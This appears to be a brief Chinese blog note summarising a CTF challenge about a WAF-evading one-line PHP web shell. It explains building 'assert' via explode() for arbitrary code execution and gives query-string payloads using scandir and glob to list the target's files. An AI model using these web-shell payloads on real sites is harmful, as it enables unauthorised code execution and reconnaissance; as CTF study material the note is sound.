21.过狗一句话
看了一些大佬的做题方法,做一下小小总结:
要知道的小知识:
explode() 函数把字符串打散为数组,$poc_1=assert;
assert() 任意代码执行,打印当前目录
1.使用?s=print_r(scandir('./'))
进行目录扫描以发现代码的执行漏洞
2.也可以通过查看所有的文件的方式? s=print_r(glob('*.*'))
作者:kali
-------------------------------------------
个性签名:纸上学来终觉浅,绝知此事要躬行。
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!